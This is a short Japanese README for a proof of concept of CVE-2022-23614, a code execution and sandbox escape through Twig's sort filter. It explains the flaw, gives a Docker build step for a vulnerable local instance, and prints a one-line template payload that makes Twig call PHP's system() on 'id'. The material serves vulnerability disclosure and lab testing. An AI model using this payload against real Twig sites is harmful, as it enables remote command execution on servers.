
CVE-2022-23614 (Twig sort filter コード実行/サンドボックス回避) の PoC
CVE-2022-23614、GHSA-5mv2-rx3q-4w2v のPoC(Twigのsortフィルターによるコード実行/サンドボックス回避)
このコミット - https://github.com/twigphp/Twig/commit/.. で見られるように、twigはユーザーが指定した関数名をコールバックパラメータとして uasort に渡していたため (こちら)、任意のコード実行が可能となりました
脆弱性のあるtwigバージョンを含むDockerコンテナをビルドして実行するには
$ ./build-docker.sh
localhost:1337 のWebページを開き、次のペイロードをレンダリングしてみてください
{{ ['id','']|sort('system') }}
PoC

結果
